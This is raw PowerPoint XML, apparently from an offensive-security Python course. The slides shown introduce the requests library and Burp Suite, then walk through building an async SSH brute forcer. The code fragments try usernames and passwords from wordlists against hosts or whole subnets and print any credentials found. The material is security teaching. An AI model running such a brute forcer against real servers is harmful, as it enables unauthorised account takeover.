              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2578E69-CE64-4843-90FC-084478AE2815}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4262886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4047329" y="219635"/>
            <a:ext cx="2549988" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Web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277876"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t>Basic Web (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50F597AF-F0CB-4FCF-A729-A138BB12F761}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1528563" y="3317133"/>
            <a:ext cx="10137507" cy="36933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b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pip install requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BEB6859-F88A-4EC7-A3E0-726E4CAB3DCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087956" y="2032763"/>
            <a:ext cx="10277876" cy="255454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We will mostly use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> library throughout this section.</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To install requests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will also take advantage of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to aid investigating the app.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83948A8E-9C98-4594-A4C4-56D648EA39D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2837681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Brute Forcing Network Services (cont.) : Brute Forcing SSH</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163121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There are several modules that can deal with SSH connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>paramiko</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>pexpect</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>asyncssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>… and few others.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D74C07E1-F32F-4D88-A15F-2D0141929CDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1063741" y="3605261"/>
            <a:ext cx="10205840" cy="1015663"/>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Since brute forcing through the network is considered I/O bound, and there are many credentials to brute force, we will use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>asyncssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> because it’s compatible with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>asyncio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>To install asyncssh, we can use pip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F97888F-D247-4368-90BF-10908575C70F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1564858" y="4857509"/>
            <a:ext cx="9372047" cy="33855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fr-FR" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pip3.10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> asyncssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C62B035-EDC8-434A-98F9-C192B4511DCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81642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Brute Forcing Network Services (cont.) : Brute Forcing SSH</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First, we will import the needed libraries:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F97888F-D247-4368-90BF-10908575C70F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1612985" y="2430025"/>
            <a:ext cx="9372047" cy="33855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C586C0"/>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sys, asyncio, asyncssh, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argparse</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ipaddress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE90780C-7443-45B8-8052-DFFCE54E900F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147961" y="2909738"/>
            <a:ext cx="10819449"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Next, the core part of our SSH brute forcer will be simple enough that it can be written in few lines:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C409112-7E5D-43A2-A94E-3AB596502C84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1612985" y="3389451"/>
            <a:ext cx="9372047" cy="332398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err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sem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asyncio.Semaphore</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100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>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def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>check_ssh_creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>host</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username</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22</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async</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with</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sem</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try</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await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asyncio.wait_for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asyncssh.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(host,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username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=username,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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=password, </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port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=port,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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public_key_auth</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False</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9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>timeout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DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print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 Credentials found:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, host, username, password)</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except</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Exception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as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> e:</a:t>
            </a:r>
          </a:p>
          <a:p>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pass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>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811465E6-FC92-4680-A060-B32E57087598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36538826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Brute Forcing Network Services (cont.) : Brute Forcing SSH</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rest of the code will just extract users/passwords from files and feed them to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>check_ssh_creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> function.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F97888F-D247-4368-90BF-10908575C70F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1608974" y="2666647"/>
            <a:ext cx="9372047" cy="4154984"/>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569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>async</a:t>
            </a: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def</a:t>
            </a:r>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main</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targets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users_file</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pwds_file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coros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =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target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>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targets:</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username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>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users_file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password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>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pwds_file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coros.append</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check_ssh_creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(target), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>username.strip</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password.strip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(), port))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pwds_file.seek</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users_file.seek</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await</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asyncio.gather</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coros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>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__name__</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"__main__"</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parser = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argparse.ArgumentParser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>description</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"Async SSH brute forcer"</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parser.add_argument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"targets"</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help</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"IPv4 host or network 192.168.10.5, 192.168.10.0/24, ..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</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nargs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1</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parser.add_argument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"-U"</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dest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users_file</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help</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"File containing users each in a line"</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required</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True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parser.add_argument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"-P"</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dest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pwds_file</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help</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"File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>containg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> passwords each in a line"</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required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>True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parser.add_argument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"-p"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
